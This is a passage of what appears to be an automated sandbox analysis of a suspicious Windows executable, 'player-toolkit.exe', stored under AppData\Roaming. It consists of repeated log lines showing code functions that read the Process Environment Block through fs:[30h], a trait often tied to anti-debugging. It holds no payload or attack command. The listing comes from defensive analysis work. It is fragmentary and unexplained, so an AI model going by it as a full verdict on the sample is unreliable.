Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029861A0 mov eax, dword ptr fs:[00000030h]	2_2_029861A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029861A0 mov eax, dword ptr fs:[00000030h]	2_2_029861A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D69A6 mov eax, dword ptr fs:[00000030h]	2_2_029D69A6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0295B1E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0295B1E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0295B1E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029E41E8 mov eax, dword ptr fs:[00000030h]	2_2_029E41E8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h]	2_2_02959100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h]	2_2_02959100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h]	2_2_02959100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298513A mov eax, dword ptr fs:[00000030h]	2_2_0298513A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298513A mov eax, dword ptr fs:[00000030h]	2_2_0298513A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h]	2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h]	2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h]	2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h]	2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov ecx, dword ptr fs:[00000030h]	2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B944 mov eax, dword ptr fs:[00000030h]	2_2_0297B944
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B944 mov eax, dword ptr fs:[00000030h]	2_2_0297B944
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B171 mov eax, dword ptr fs:[00000030h]	2_2_0295B171
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B171 mov eax, dword ptr fs:[00000030h]	2_2_0295B171
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295C962 mov eax, dword ptr fs:[00000030h]	2_2_0295C962
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h]	2_2_02A20EA5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h]	2_2_02A20EA5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h]	2_2_02A20EA5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EFE87 mov eax, dword ptr fs:[00000030h]	2_2_029EFE87
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D46A7 mov eax, dword ptr fs:[00000030h]	2_2_029D46A7
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029836CC mov eax, dword ptr fs:[00000030h]	2_2_029836CC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02998EC7 mov eax, dword ptr fs:[00000030h]	2_2_02998EC7
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0FEC0 mov eax, dword ptr fs:[00000030h]	2_2_02A0FEC0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28ED6 mov eax, dword ptr fs:[00000030h]	2_2_02A28ED6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029676E2 mov eax, dword ptr fs:[00000030h]	2_2_029676E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029816E0 mov ecx, dword ptr fs:[00000030h]	2_2_029816E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A61C mov eax, dword ptr fs:[00000030h]	2_2_0298A61C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A61C mov eax, dword ptr fs:[00000030h]	2_2_0298A61C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h]	2_2_0295C600
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h]	2_2_0295C600
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h]	2_2_0295C600
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02988E00 mov eax, dword ptr fs:[00000030h]	2_2_02988E00
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0FE3F mov eax, dword ptr fs:[00000030h]	2_2_02A0FE3F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11608 mov eax, dword ptr fs:[00000030h]	2_2_02A11608
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295E620 mov eax, dword ptr fs:[00000030h]	2_2_0295E620
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]	2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]	2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]	2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]	2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]	2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]	2_2_02967E41
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]	2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]	2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]	2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]	2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]	2_2_0297AE73
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1AE44 mov eax, dword ptr fs:[00000030h]	2_2_02A1AE44
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1AE44 mov eax, dword ptr fs:[00000030h]	2_2_02A1AE44
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296766D mov eax, dword ptr fs:[00000030h]	2_2_0296766D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02968794 mov eax, dword ptr fs:[00000030h]	2_2_02968794
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h]	2_2_029D7794
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h]	2_2_029D7794
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h]	2_2_029D7794
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029937F5 mov eax, dword ptr fs:[00000030h]	2_2_029937F5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297F716 mov eax, dword ptr fs:[00000030h]	2_2_0297F716
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EFF10 mov eax, dword ptr fs:[00000030h]	2_2_029EFF10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EFF10 mov eax, dword ptr fs:[00000030h]	2_2_029EFF10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A70E mov eax, dword ptr fs:[00000030h]	2_2_0298A70E
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A70E mov eax, dword ptr fs:[00000030h]	2_2_0298A70E
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298E730 mov eax, dword ptr fs:[00000030h]	2_2_0298E730
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B73D mov eax, dword ptr fs:[00000030h]	2_2_0297B73D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B73D mov eax, dword ptr fs:[00000030h]	2_2_0297B73D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2070D mov eax, dword ptr fs:[00000030h]	2_2_02A2070D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2070D mov eax, dword ptr fs:[00000030h]	2_2_02A2070D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02954F2E mov eax, dword ptr fs:[00000030h]	2_2_02954F2E
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02954F2E mov eax, dword ptr fs:[00000030h]	2_2_02954F2E
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28F6A mov eax, dword ptr fs:[00000030h]	2_2_02A28F6A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296EF40 mov eax, dword ptr fs:[00000030h]	2_2_0296EF40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296FF60 mov eax, dword ptr fs:[00000030h]	2_2_0296FF60
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296849B mov eax, dword ptr fs:[00000030h]	2_2_0296849B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]	2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A114FB mov eax, dword ptr fs:[00000030h]	2_2_02A114FB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h]	2_2_029D6CF0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h]	2_2_029D6CF0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h]	2_2_029D6CF0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28CD6 mov eax, dword ptr fs:[00000030h]	2_2_02A28CD6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h]	2_2_029D6C0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h]	2_2_029D6C0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h]	2_2_029D6C0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h]	2_2_029D6C0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]	2_2_02A11C06
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h]	2_2_02A2740D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h]	2_2_02A2740D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h]	2_2_02A2740D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298BC2C mov eax, dword ptr fs:[00000030h]	2_2_0298BC2C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EC450 mov eax, dword ptr fs:[00000030h]	2_2_029EC450
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EC450 mov eax, dword ptr fs:[00000030h]	2_2_029EC450
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A44B mov eax, dword ptr fs:[00000030h]	2_2_0298A44B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]	2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]	2_2_0298AC7B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297746D mov eax, dword ptr fs:[00000030h]	2_2_0297746D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298FD9B mov eax, dword ptr fs:[00000030h]	2_2_0298FD9B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298FD9B mov eax, dword ptr fs:[00000030h]	2_2_0298FD9B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A205AC mov eax, dword ptr fs:[00000030h]	2_2_02A205AC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A205AC mov eax, dword ptr fs:[00000030h]	2_2_02A205AC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h]	2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h]	2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h]	2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h]	2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]	2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]	2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]	2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]	2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]	2_2_02952D8A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]	2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]	2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]	2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]	2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]	2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]	2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]	2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h]	2_2_02981DB5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h]	2_2_02981DB5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h]	2_2_02981DB5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029835A1 mov eax, dword ptr fs:[00000030h]	2_2_029835A1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h]	2_2_02A1FDE2
